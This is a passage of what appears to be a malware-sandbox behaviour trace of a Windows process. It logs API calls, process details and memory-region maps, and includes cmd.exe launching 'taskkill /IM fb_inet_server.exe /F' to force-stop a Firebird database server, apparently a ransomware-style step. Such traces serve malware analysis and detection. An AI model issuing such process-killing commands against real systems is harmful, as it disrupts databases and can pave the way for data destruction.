lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0125.182] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.191] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0125.192] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0125.192] GetConsoleTitleW (in: lpConsoleTitle=0x454f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0125.192] InitializeProcThreadAttributeList (in: lpAttributeList=0x454f2e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x454f2cc | out: lpAttributeList=0x454f2e8, lpSize=0x454f2cc) returned 1 [0125.192] UpdateProcThreadAttribute (in: lpAttributeList=0x454f2e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x454f2d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x454f2e8, lpPreviousValue=0x0) returned 1 [0125.192] GetStartupInfoW (in: lpStartupInfo=0x454f320 | out: lpStartupInfo=0x454f320*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.192] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.193] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.193] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.195] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill \\/IM fb_inet_server.exe \\/F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x454f270*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill \\/IM fb_inet_server.exe \\/F", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x454f2bc | out: lpCommandLine="taskkill \\/IM fb_inet_server.exe \\/F", lpProcessInformation=0x454f2bc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd30, dwThreadId=0xd20)) returned 1 [0125.361] CloseHandle (hObject=0xa4) returned 1 [0125.361] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0125.362] GetEnvironmentStringsW () returned 0x45e9ef0* [0125.362] FreeEnvironmentStringsA (penv="=") returned 1 [0125.362] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0125.653] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x454f254 | out: lpExitCode=0x454f254*=0x1) returned 1 [0125.653] CloseHandle (hObject=0xa8) returned 1 [0125.653] _vsnwprintf (in: _Buffer=0x454f33c, _BufferCount=0x13, _Format="%08X", _ArgList=0x454f25c | out: _Buffer="00000001") returned 8 [0125.653] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0125.653] GetEnvironmentStringsW () returned 0x45e7d88* [0125.653] FreeEnvironmentStringsA (penv="=") returned 1 [0125.653] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0125.653] GetEnvironmentStringsW () returned 0x45e7d88* [0125.653] FreeEnvironmentStringsA (penv="=") returned 1 [0125.653] DeleteProcThreadAttributeList (in: lpAttributeList=0x454f2e8 | out: lpAttributeList=0x454f2e8) [0125.653] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.653] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0125.654] _get_osfhandle (_FileHandle=1) returned 0x3c [0125.654] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0125.654] _get_osfhandle (_FileHandle=0) returned 0x38 [0125.654] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0125.654] SetConsoleInputExeNameW () returned 0x1 [0125.654] GetConsoleOutputCP () returned 0x1b5 [0125.654] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0125.654] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.654] exit (_Code=1) Thread: id = 349 os_tid = 0xd14 Process: id = "83" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3a060000" os_pid = "0xd38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xd48" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5309 start_va = 0x7fb61000 end_va = 0x7fb61fff entry_point = 0x0 region_type = private name = "private_0x000000007fb61000" filename = "" Region: id = 5310 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5311 start_va = 0x53d5190000 end_va = 0x53d51affff entry_point = 0x0 region_type = private name = "private_0x00000053d5190000" filename = "" Region: id = 5312 start_va = 0x53d51b0000 end_va = 0x53d51c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d51b0000" filename = "" Region: id = 5313 start_va = 0x53d51d0000 end_va = 0x53d520ffff entry_point = 0x0 region_type = private name = "private_0x00000053d51d0000" filename = "" Region: id = 5314 start_va = 0x7df5ff800000 end_va = 0x7ff5ff7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff800000" filename = "" Region: id = 5315 start_va = 0x7ff6c4030000 end_va = 0x7ff6c4052fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4030000" filename = "" Region: id = 5316 start_va = 0x7ff6c4056000 end_va = 0x7ff6c4056fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4056000" filename = "" Region: id = 5317 start_va = 0x7ff6c405e000 end_va = 0x7ff6c405ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c405e000" filename = "" Region: id = 5318 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 5319 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5320 start_va = 0x53d53e0000 end_va = 0x53d54dffff entry_point = 0x0 region_type = private name = "private_0x00000053d53e0000" filename = "" Region: id = 5321 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5322 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5323 start_va = 0x53d5190000 end_va = 0x53d519ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d5190000" filename = "" Region: id = 5324 start_va = 0x53d51a0000 end_va = 0x53d51a6fff entry_point = 0x0 region_type = private name = "private_0x00000053d51a0000" filename = "" Region: id = 5325 start_va = 0x53d5210000 end_va = 0x53d52cdfff entry_point = 0x53d5210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5326 start_va = 0x53d52d0000 end_va = 0x53d530ffff entry_point = 0x0 region_type = private name = "private_0x00000053d52d0000" filename = "" Region: id = 5327 start_va = 0x53d5310000 end_va = 0x53d5310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d5310000" filename = "" Region: id = 5328 start_va = 0x53d5320000 end_va = 0x53d5326fff entry_point = 0x0 region_type = private name = "private_0x00000053d5320000" filename = "" Region: id = 5329 start_va = 0x53d5330000 end_va = 0x53d5330fff entry_point = 0x0 region_type = private name = "private_0x00000053d5330000" filename = "" Region: id = 5330 start_va = 0x53d5340000 end_va = 0x53d5340fff entry_point = 0x0 region_type = private name = "private_0x00000053d5340000" filename = "" Region: id = 5331 start_va = 0x53d54e0000 end_va = 0x53d5667fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d54e0000" filename = "" Region: id = 5332 start_va = 0x53d5670000 end_va = 0x53d567ffff entry_point = 0x0 region_type = private name = "private_0x00000053d5670000" filename = "" Region: id = 5333 start_va = 0x53d5680000 end_va = 0x53d5800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d5680000" filename = "" Region: id = 5334 start_va = 0x53d5810000 end_va = 0x53d6c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000053d5810000" filename = "" Region: id = 5335 start_va = 0x7ff6c3f30000 end_va = 0x7ff6c402ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f30000" filename = "" Region: id = 5336 start_va = 0x7ff6c405c000 end_va = 0x7ff6c405dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c405c000" filename = "" Region: id = 5337 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 5338 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 5339 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5340 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5341 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5342 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5343 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5344 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5345 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5346 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5347 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5348 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 346 os_tid = 0xd40 Thread: id = 347 os_tid = 0xd3c Thread: id = 348 os_tid = 0xd24 Process: id = "84" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3d1f4000" os_pid = "0xd30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "82" os_parent_pid = "0xd48" cmd_line = "taskkill \\/IM fb_inet_server.exe \\/F" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5362 start_va = 0x130000 end_va = 0x145fff entry_point = 0x130000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 5363 start_va = 0x520000 end_va = 0x451ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 5364 start_va = 0x4520000 end_va = 0x453ffff entry_point = 0x0 region_type = private name = "private_0x0000000004520000" filename = "" Region: id = 5365 start_va = 0x4540000 end_va = 0x4541fff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 5366 start_va = 0x4550000 end_va = 0x4563fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004550000" filename = "" Region: id = 5367 start_va = 0x4570000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 5368 start_va = 0x45b0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 5369 start_va = 0x45f0000 end_va = 0x45f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Region: id = 5370 start_va = 0x4600000 end_va = 0x4600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 5371 start_va = 0x4610000 end_va = 0x4611fff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 5372 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5373 start_va = 0x7f270000 end_va = 0x7f292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f270000" filename = "" Region: id = 5374 start_va = 0x7f295000 end_va = 0x7f295fff entry_point = 0x0 region_type = private name = "private_0x000000007f295000" filename = "" Region: id = 5375 start_va = 0x7f29a000 end_va = 0x7f29cfff entry_point = 0x0 region_type = private name = "private_0x000000007f29a000" filename = "" Region: id = 5376 start_va = 0x7f29d000 end_va = 0x7f29dfff entry_point = 0x0 region_type = private name = "private_0x000000007f29d000" filename = "" Region: id = 5377 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5378 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5379 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5380 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5381 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5382 start_va = 0x47d0000 end_va = 0x47dffff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 5383 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5384 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5385 start_va = 0x48e0000 end_va = 0x49dffff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 5386 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5387 start_va = 0x4520000 end_va = 0x452ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Region: id = 5388 start_va = 0x4530000 end_va = 0x4533fff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5389 start_va = 0x4620000 end_va = 0x46ddfff entry_point = 0x4620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5390 start_va = 0x46e0000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 5391 start_va = 0x4720000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 5392 start_va = 0x4b30000 end_va = 0x4b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 5393 start_va = 0x748e0000 end_va = 0x74a1efff entry_point = 0x748e0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5394 start_va = 0x74a20000 end_va = 0x74a5efff entry_point = 0x74a20000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5395 start_va = 0x74a60000 end_va = 0x74a67fff entry_point = 0x74a60000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5396 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 5397 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 5398 start_va = 0x74b20000 end_va = 0x74b36fff entry_point = 0x74b20000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5399 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5400 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5401 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5402 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5403 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5404 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5405 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5406 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5407 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5408 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5409 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5410 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5411 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5412 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 5413 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5414 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5415 start_va = 0x7f170000 end_va = 0x7f26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f170000" filename = "" Region: id = 5416 start_va = 0x7f297000 end_va = 0x7f299fff entry_point = 0x0 region_type = private name = "private_0x000000007f297000" filename = "" Region: id = 5417 start_va = 0x4540000 end_va = 0x4544fff entry_point = 0x4540000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 5418 start_va = 0x4760000 end_va = 0x4760fff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 5419 start_va = 0x4770000 end_va = 0x4770fff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 